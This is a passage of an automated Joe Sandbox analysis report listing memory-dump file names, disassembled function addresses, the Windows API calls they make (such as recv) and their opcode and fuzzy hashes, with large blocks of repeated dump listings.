                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                            • Opcode ID: b7d47214e4967c1a269f1f44951448360ad4b42e5190d79987c6cfd0d2857a38
                                                                                                                                                                                                                                                                            • Instruction ID: 2c780b6b3af850a577f7d85cfa57e1d4f22b5fc5f1675e368692af836f24345b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7d47214e4967c1a269f1f44951448360ad4b42e5190d79987c6cfd0d2857a38
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26C22771E086288BDF65CE28DD40BEAB7F5EB48304F1541EAD84DE7241E779AE819F40
                                                                                                                                                                                                                                                                            Function 0005E0C0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • recv.WS2_32(?,?,00000004,00000000), ref: 0005E10B
                                                                                                                                                                                                                                                                            • recv.WS2_32(?,?,00000008,00000000), ref: 0005E140
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: recv
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5ea0b3572da1d446b298bf9de14423ed1f0d570e978af4c17f8bcbb9480fb7f2
                                                                                                                                                                                                                                                                            • Instruction ID: 5aaebafc6b5414d3b901de8087837ddd5bcca4a2bff5eee8bfa4de4d79e8ef3f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ea0b3572da1d446b298bf9de14423ed1f0d570e978af4c17f8bcbb9480fb7f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531E971A006485FE724CB68CC81BEB77FCEB08724F000625F950E72D1C679A944CBA4
                                                                                                                                                                                                                                                                            Function 00092D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 376a5576fd4b68412969484e8d56b81b9300990959441ba6e7d287c5c1a7ddeb
                                                                                                                                                                                                                                                                            • Instruction ID: 7b40c3cd77dbd5b68769e00ce3271bb4b2f8363c5b73686f8423afa2957b1c72
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 376a5576fd4b68412969484e8d56b81b9300990959441ba6e7d287c5c1a7ddeb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DF13E71E012199BDF14CFA9C8906AEB7F1FF88314F158269E919AB345D731AE01DF90
                                                                                                                                                                                                                                                                            Function 0006CBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,0006CF52,?,00000003,00000003,?,0006CF87,?,?,?,00000003,00000003,?,0006C4FD,00052FB9,00000001), ref: 0006CC03
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1802150274-0
                                                                                                                                                                                                                                                                            • Opcode ID: d50ae9a551ffb79aafbd073e65273f0d9cf584ec6916bd996fc3862a9cf419b6
                                                                                                                                                                                                                                                                            • Instruction ID: 1ae1b0b25d975570bcce725a2ac33598d52c34e395786d192d5605a7619a40fe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d50ae9a551ffb79aafbd073e65273f0d9cf584ec6916bd996fc3862a9cf419b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62D0223274653CD3EA913B88EC00DBCBB898B01B643040151EA0813220CA566C806BD4
                                                                                                                                                                                                                                                                            Function 00087F36 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
